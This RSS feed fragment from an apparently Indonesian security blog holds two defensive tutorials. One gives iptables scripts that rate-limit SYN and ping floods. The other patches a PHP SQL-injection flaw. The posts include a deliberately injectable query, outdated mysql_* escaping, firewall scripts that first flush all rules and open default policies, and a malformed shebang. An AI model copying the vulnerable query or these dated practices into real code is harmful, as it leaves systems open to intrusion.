			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;">
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/image005.jpg"><img class="size-full wp-image-154 aligncenter" title="image005" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/image005.jpg" alt="" width="553" height="526" /></a></p>
<p>1. Mencegah paket Syn Flood Attack<span id="more-153"></span><br />
Buat sebuah file bernama closesyn.sh yang isinya sebagai berikut untuk mencegah serangan syn flood</p>
<blockquote><p>#!bin/sh<br />
#Menghapus semua Rule<br />
iptables -F<br />
iptables -X<br />
iptables -P INPUT ACCEPT<br />
iptables -P OUTPUT ACCEPT<br />
iptables -P FORWARD ACCEPT<br />
#blok paket syn yang dicurigai jahat<br />
iptables -N synjahat<br />
iptables -A INPUT -p tcp &#8211;syn -j synjahat<br />
iptables -A synjahat -m limit &#8211;limit 1/s &#8211;limit-burst 3 -j ACCEPT<br />
iptables -A synjahat -j DROP</p></blockquote>
<p>kemudian jalankan di konsole/terminal</p>
<blockquote><p>root@bt:~# sh closesyn.sh</p></blockquote>
<p>2. Mencegah Ping Flood attack<br />
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood</p>
<blockquote><p>#!bin/sh<br />
#Menghapus semua Rule<br />
iptables -F<br />
iptables -X<br />
iptables -P INPUT ACCEPT<br />
iptables -P OUTPUT ACCEPT<br />
iptables -P FORWARD ACCEPT<br />
#blok paket ping(icmp) yang dicurigai jahat<br />
iptables -N pingjahat<br />
iptables -A INPUT -p icmp -j pingjahat<br />
iptables -A pingjahat -m limit &#8211;limit 1/s &#8211;limit-burst 2 -j ACCEPT<br />
iptables -A pingjahat -j DROP</p></blockquote>
<blockquote><p>root@bt:~# sh closeping.sh</p></blockquote>
<p>coba lakukan testing dengan perintah</p>
<blockquote><p>root@bt:~#ping [target] -s 6500</p></blockquote>
<p>Ok sekian dulu. Thank&#8217;s jika ada yang kurang jelas silahkan tanya <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><sub>This article was originally published in forum thread: <a href="http://www.indonesianhacker.or.id/content/threads/5121-Mencegah-serangan-Syn-amp-Ping-Flood-Attack-(DOS)" target="_self">Mencegah serangan Syn &amp; Ping Flood Attack (DOS)</a> started by <a href="http://www.indonesianhacker.or.id/content/members/1707-bilanganbiner" target="_self">bilanganbiner</a> </sub><sub><a href="http://www.indonesianhacker.or.id/content/threads/5121-Mencegah-serangan-Syn-amp-Ping-Flood-Attack-(DOS)?p=62950#post62950" target="_self">View original post</a></sub></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;n=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;title=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;title=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;title=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29&amp;desc=%0D%0A%0D%0A1.%20Mencegah%20paket%20Syn%20Flood%20Attack%0D%0ABuat%20sebuah%20file%20bernama%20closesyn.sh%20yang%20isinya%20sebagai%20berikut%20untuk%20mencegah%20serangan%20syn%20flood%0D%0A%23%21bin%2Fsh%0D%0A%23Menghapus%20semua%20Rule%0D%0Aiptables%20-F%0D%0Aiptables%20-X%0D%0Aiptables%20-P%20INPUT%20ACCEPT%0D%0Aiptables%20-P%20OUTPUT%20ACCEPT%0D%0Aiptables%20-P%20FORWARD%20ACCEPT%0D%0A%23blok%20paket%20syn%20yang" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;t=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29&amp;body=Link: http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0A%0D%0A1.%20Mencegah%20paket%20Syn%20Flood%20Attack%0D%0ABuat%20sebuah%20file%20bernama%20closesyn.sh%20yang%20isinya%20sebagai%20berikut%20untuk%20mencegah%20serangan%20syn%20flood%0D%0A%23%21bin%2Fsh%0D%0A%23Menghapus%20semua%20Rule%0D%0Aiptables%20-F%0D%0Aiptables%20-X%0D%0Aiptables%20-P%20INPUT%20ACCEPT%0D%0Aiptables%20-P%20OUTPUT%20ACCEPT%0D%0Aiptables%20-P%20FORWARD%20ACCEPT%0D%0A%23blok%20paket%20syn%20yang" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;title=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;title=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29&amp;srcUrl=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;srcTitle=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29&amp;snippet=%0D%0A%0D%0A1.%20Mencegah%20paket%20Syn%20Flood%20Attack%0D%0ABuat%20sebuah%20file%20bernama%20closesyn.sh%20yang%20isinya%20sebagai%20berikut%20untuk%20mencegah%20serangan%20syn%20flood%0D%0A%23%21bin%2Fsh%0D%0A%23Menghapus%20semua%20Rule%0D%0Aiptables%20-F%0D%0Aiptables%20-X%0D%0Aiptables%20-P%20INPUT%20ACCEPT%0D%0Aiptables%20-P%20OUTPUT%20ACCEPT%0D%0Aiptables%20-P%20FORWARD%20ACCEPT%0D%0A%23blok%20paket%20syn%20yang" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;t=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29&amp;body=Link: http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0A%0D%0A1.%20Mencegah%20paket%20Syn%20Flood%20Attack%0D%0ABuat%20sebuah%20file%20bernama%20closesyn.sh%20yang%20isinya%20sebagai%20berikut%20untuk%20mencegah%20serangan%20syn%20flood%0D%0A%23%21bin%2Fsh%0D%0A%23Menghapus%20semua%20Rule%0D%0Aiptables%20-F%0D%0Aiptables%20-X%0D%0Aiptables%20-P%20INPUT%20ACCEPT%0D%0Aiptables%20-P%20OUTPUT%20ACCEPT%0D%0Aiptables%20-P%20FORWARD%20ACCEPT%0D%0A%23blok%20paket%20syn%20yang" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
			<a href="mailto:?subject=%22Mencegah%20serangan%20Syn%20%26%20Ping%20Flood%20Attack%20%28DOS%29%22&amp;body=Link: http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0A%0D%0A1.%20Mencegah%20paket%20Syn%20Flood%20Attack%0D%0ABuat%20sebuah%20file%20bernama%20closesyn.sh%20yang%20isinya%20sebagai%20berikut%20untuk%20mencegah%20serangan%20syn%20flood%0D%0A%23%21bin%2Fsh%0D%0A%23Menghapus%20semua%20Rule%0D%0Aiptables%20-F%0D%0Aiptables%20-X%0D%0Aiptables%20-P%20INPUT%20ACCEPT%0D%0Aiptables%20-P%20OUTPUT%20ACCEPT%0D%0Aiptables%20-P%20FORWARD%20ACCEPT%0D%0A%23blok%20paket%20syn%20yang" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;bm_description=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;title=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;t=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29+-+http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;title=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;title=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29+-+http://bit.ly/i7RsPq&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/&amp;submitHeadline=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29&amp;submitSummary=%0D%0A%0D%0A1.%20Mencegah%20paket%20Syn%20Flood%20Attack%0D%0ABuat%20sebuah%20file%20bernama%20closesyn.sh%20yang%20isinya%20sebagai%20berikut%20untuk%20mencegah%20serangan%20syn%20flood%0D%0A%23%21bin%2Fsh%0D%0A%23Menghapus%20semua%20Rule%0D%0Aiptables%20-F%0D%0Aiptables%20-X%0D%0Aiptables%20-P%20INPUT%20ACCEPT%0D%0Aiptables%20-P%20OUTPUT%20ACCEPT%0D%0Aiptables%20-P%20FORWARD%20ACCEPT%0D%0A%23blok%20paket%20syn%20yang&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Mencegah+serangan+Syn+%26+Ping+Flood+Attack+%28DOS%29&amp;body=Link: http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0A%0D%0A1.%20Mencegah%20paket%20Syn%20Flood%20Attack%0D%0ABuat%20sebuah%20file%20bernama%20closesyn.sh%20yang%20isinya%20sebagai%20berikut%20untuk%20mencegah%20serangan%20syn%20flood%0D%0A%23%21bin%2Fsh%0D%0A%23Menghapus%20semua%20Rule%0D%0Aiptables%20-F%0D%0Aiptables%20-X%0D%0Aiptables%20-P%20INPUT%20ACCEPT%0D%0Aiptables%20-P%20OUTPUT%20ACCEPT%0D%0Aiptables%20-P%20FORWARD%20ACCEPT%0D%0A%23blok%20paket%20syn%20yang" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/mencegah-serangan-syn-ping-flood-attack-dos/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQL Injection Flaw Patching</title>
		<link>http://www.james0baster.web.id/v2/sql-injection-flaw-patching/</link>
		<comments>http://www.james0baster.web.id/v2/sql-injection-flaw-patching/#comments</comments>
		<pubDate>Wed, 24 Feb 2010 06:35:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Berita dan Pengumuman]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Keamanan & Perbaikan WEB]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Pemerograman]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=104</guid>
		<description><![CDATA[<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/sqlinjection.jpg"><img class="alignleft" title="sqlinjection" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/sqlinjection.jpg" alt="" width="248" height="120" /></a>dan diambil dari <a href="http://www.indonesianhacker.org/showthread.php?t=529">http://www.indonesianhacker.org/showthread.php?t=529</a> yang diposting oleh <a href="http://www.indonesianhacker.org/member.php?u=19">v4mp</a></p>
<p>Jangan cuma bisa attack. Tapi juga harus bisa defend. <img title="Big Grin" src="http://www.indonesianhacker.org/images/smilies/4.gif" border="0" alt="" /></p>
<p>Langsung aja..</p>
<p>Ini patch untuk mencegah serangan SQL Injection di halaman dinamis pada PHP + MySQL.<span id="more-104"></span></p>
<p>Biasanya halaman dinamis ini<br />
bentuknya kayak gini <a href="http://uhui.com/vuln.php?id=" target="_blank">http://uhui.com/vuln.php?id=</a>[Input_Angka]</p>
<p>Bentuk umum kode di halaman dinamis php untuk membaca database melalui MySQL :</p>
<div>
<div>PHP Code:</div>
<div dir="ltr"><code><code>$id = htmlentities($_GET['id']);<br />
$variabel = mysql_query("select *from tabeltarget where idtarget='$id'")<br />
</code></code></div>
</div>
<p>Injection Flaw terjadi karena inputnya gak kefilter dengan baik. Sehingga input &#8216;$id&#8217; yang seharusnya diisi dengan (biasanya) angka bisa diisi dengan query SQL.. Yang mengakibatkan query SQL tersebut dieksekusi sehingga injector bisa melakukan berbagai hal misalnya membaca isi database, membaca suatu file di situs tersebut, dll.</p>
<p>Nah, untuk mencegah hal tersebut sebaiknya kita memfilter inputnya sebelum diproses dengan SQL.</p>
<p>Contoh kode filternya :</p>
<div>
<div>PHP Code:</div>
<div dir="ltr"><code><code>error_reporting(0);<br />
class filter{<br />
function filtering($id){<br />
$idfilter = mysql_real_escape_string($id);<br />
if (!ctype_digit($idfilter))<br />
{<br />
echo "Can't process your request, dude :P ";<br />
exit;<br />
}<br />
else if ($idfilter &lt;= 0)<br />
{<br />
echo "Can't process your request, dude :P  ";<br />
exit;<br />
}<br />
else<br />
{<br />
return $id;<br />
}<br />
}<br />
}<br />
$Filter2 = new filter();<br />
$id = htmlentities($_GET['id']);<br />
$secured = $Filter2-&gt;filtering($id);<br />
$variabel = mysql_query("select *from tabeltarget where idtarget='$secured'")<br />
</code></code></div>
</div>
<p>Penjelasan :</p>
<p>Pertama-tama menggunakan <strong>error_reporting(0);</strong> . Kode tersebut digunakan untuk mendisable error reporting sehingga jika terjadi error tidak keluar pesan error.</p>
<p>Selanjutnya variabel <strong>$id</strong> disaring dulu menggunakan <strong>mysql_real_escape_string</strong> yang berfungsi untuk menambahkan slash (\) apabila ada tanda kutip pada input <strong>$id</strong>.</p>
<p>Setelah disaring dengan <strong>mysql_real_escape_string</strong>, disaring lagi dengan melakukan pengecekan apakah inputnya berupa angka atau bukan dengan menggunakan kode <strong>!ctype_digit</strong> . Jika ternyata bukan angka maka akan ditolak. Selain pengecekan input apakah angka atau bukan, dilakukan juga pengecekan apakah inputnya sama atau lebih kecil dari 0 (minus) jika iya maka akan ditolak.</p>
<p>Abis itu baru deh aplikasikan ke syntax SQL-nya.</p>
<p>Untuk lebih jelasnya silahkan baca ulang kode sebelum difilter dan setelah difilter berkali-kali sampai paham. <img title="Big Grin" src="http://www.indonesianhacker.org/images/smilies/4.gif" border="0" alt="" /></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/sqlinjection.jpg"><img class="alignleft" title="sqlinjection" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/sqlinjection.jpg" alt="" width="248" height="120" /></a>dan diambil dari <a href="http://www.indonesianhacker.org/showthread.php?t=529">http://www.indonesianhacker.org/showthread.php?t=529</a> yang diposting oleh <a href="http://www.indonesianhacker.org/member.php?u=19">v4mp</a></p>
<p>Jangan cuma bisa attack. Tapi juga harus bisa defend. <img title="Big Grin" src="http://www.indonesianhacker.org/images/smilies/4.gif" border="0" alt="" /></p>
<p>Langsung aja..</p>
<p>Ini patch untuk mencegah serangan SQL Injection di halaman dinamis pada PHP + MySQL.<span id="more-104"></span></p>
<p>Biasanya halaman dinamis ini<br />
bentuknya kayak gini <a href="http://uhui.com/vuln.php?id=" target="_blank">http://uhui.com/vuln.php?id=</a>[Input_Angka]</p>
<p>Bentuk umum kode di halaman dinamis php untuk membaca database melalui MySQL :</p>
<div>
<div>PHP Code:</div>
<div dir="ltr"><code><code>$id = htmlentities($_GET['id']);<br />
$variabel = mysql_query("select *from tabeltarget where idtarget='$id'")<br />
</code></code></div>
</div>
<p>Injection Flaw terjadi karena inputnya gak kefilter dengan baik. Sehingga input &#8216;$id&#8217; yang seharusnya diisi dengan (biasanya) angka bisa diisi dengan query SQL.. Yang mengakibatkan query SQL tersebut dieksekusi sehingga injector bisa melakukan berbagai hal misalnya membaca isi database, membaca suatu file di situs tersebut, dll.</p>
<p>Nah, untuk mencegah hal tersebut sebaiknya kita memfilter inputnya sebelum diproses dengan SQL.</p>
<p>Contoh kode filternya :</p>
<div>
<div>PHP Code:</div>
<div dir="ltr"><code><code>error_reporting(0);<br />
class filter{<br />
function filtering($id){<br />
$idfilter = mysql_real_escape_string($id);<br />
if (!ctype_digit($idfilter))<br />
{<br />
echo "Can't process your request, dude :P ";<br />
exit;<br />
}<br />
else if ($idfilter &lt;= 0)<br />
{<br />
echo "Can't process your request, dude :P  ";<br />
exit;<br />
}<br />
else<br />
{<br />
return $id;<br />
}<br />
}<br />
}<br />
$Filter2 = new filter();<br />
$id = htmlentities($_GET['id']);<br />
$secured = $Filter2-&gt;filtering($id);<br />
$variabel = mysql_query("select *from tabeltarget where idtarget='$secured'")<br />
</code></code></div>
</div>
<p>Penjelasan :</p>
<p>Pertama-tama menggunakan <strong>error_reporting(0);</strong> . Kode tersebut digunakan untuk mendisable error reporting sehingga jika terjadi error tidak keluar pesan error.</p>
<p>Selanjutnya variabel <strong>$id</strong> disaring dulu menggunakan <strong>mysql_real_escape_string</strong> yang berfungsi untuk menambahkan slash (\) apabila ada tanda kutip pada input <strong>$id</strong>.</p>
<p>Setelah disaring dengan <strong>mysql_real_escape_string</strong>, disaring lagi dengan melakukan pengecekan apakah inputnya berupa angka atau bukan dengan menggunakan kode <strong>!ctype_digit</strong> . Jika ternyata bukan angka maka akan ditolak. Selain pengecekan input apakah angka atau bukan, dilakukan juga pengecekan apakah inputnya sama atau lebih kecil dari 0 (minus) jika iya maka akan ditolak.</p>
<p>Abis itu baru deh aplikasikan ke syntax SQL-nya.</p>
<p>Untuk lebih jelasnya silahkan baca ulang kode sebelum difilter dan setelah difilter berkali-kali sampai paham. <img title="Big Grin" src="http://www.indonesianhacker.org/images/smilies/4.gif" border="0" alt="" /></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;n=SQL+Injection+Flaw+Patching&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/sql-injection-flaw-patching/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;title=SQL+Injection+Flaw+Patching" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;title=SQL+Injection+Flaw+Patching" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;title=SQL+Injection+Flaw+Patching&amp;desc=dan%20diambil%20dari%C2%A0http%3A%2F%2Fwww.indonesianhacker.org%2Fshowthread.php%3Ft%3D529%20yang%20diposting%20oleh%C2%A0v4mp%0D%0A%0D%0AJangan%20cuma%20bisa%20attack.%20Tapi%20juga%20harus%20bisa%20defend.%C2%A0%0D%0A%0D%0ALangsung%20aja..%0D%0A%0D%0AIni%20patch%20untuk%20mencegah%20serangan%20SQL%20Injection%20di%20halaman%20dinamis%20pada%20PHP%20%2B%20MySQL.%0D%0A%0D%0ABiasanya%20halaman%20dinamis%20ini%0D%0Abentu" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;t=SQL+Injection+Flaw+Patching" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=SQL+Injection+Flaw+Patching&amp;body=Link: http://www.james0baster.web.id/v2/sql-injection-flaw-patching/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A dan%20diambil%20dari%C2%A0http%3A%2F%2Fwww.indonesianhacker.org%2Fshowthread.php%3Ft%3D529%20yang%20diposting%20oleh%C2%A0v4mp%0D%0A%0D%0AJangan%20cuma%20bisa%20attack.%20Tapi%20juga%20harus%20bisa%20defend.%C2%A0%0D%0A%0D%0ALangsung%20aja..%0D%0A%0D%0AIni%20patch%20untuk%20mencegah%20serangan%20SQL%20Injection%20di%20halaman%20dinamis%20pada%20PHP%20%2B%20MySQL.%0D%0A%0D%0ABiasanya%20halaman%20dinamis%20ini%0D%0Abentu" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;title=SQL+Injection+Flaw+Patching" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;title=SQL+Injection+Flaw+Patching&amp;srcUrl=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;srcTitle=SQL+Injection+Flaw+Patching&amp;snippet=dan%20diambil%20dari%C2%A0http%3A%2F%2Fwww.indonesianhacker.org%2Fshowthread.php%3Ft%3D529%20yang%20diposting%20oleh%C2%A0v4mp%0D%0A%0D%0AJangan%20cuma%20bisa%20attack.%20Tapi%20juga%20harus%20bisa%20defend.%C2%A0%0D%0A%0D%0ALangsung%20aja..%0D%0A%0D%0AIni%20patch%20untuk%20mencegah%20serangan%20SQL%20Injection%20di%20halaman%20dinamis%20pada%20PHP%20%2B%20MySQL.%0D%0A%0D%0ABiasanya%20halaman%20dinamis%20ini%0D%0Abentu" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/sql-injection-flaw-patching/&amp;t=SQL+Injection+Flaw+Patching" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=SQL+Injection+Flaw+Patching&amp;body=Link: http://www.james0baster.web.id/v2/sql-injection-flaw-patching/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A dan%20diambil%20dari%C2%A0http%3A%2F%2Fwww.indonesianhacker.org%2Fshowthread.php%3Ft%3D529%20yang%20diposting%20oleh%C2%A0v4mp%0D%0A%0D%0AJangan%20cuma%20bisa%20attack.%20Tapi%20juga%20harus%20bisa%20defend.%C2%A0%0D%0A%0D%0ALangsung%20aja..%0D%0A%0D%0AIni%20patch%20untuk%20mencegah%20serangan%20SQL%20Injection%20di%20halaman%20dinamis%20pada%20PHP%20%2B%20MySQL.%0D%0A%0D%0ABiasanya%20halaman%20dinamis%20ini%0D%0Abentu" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
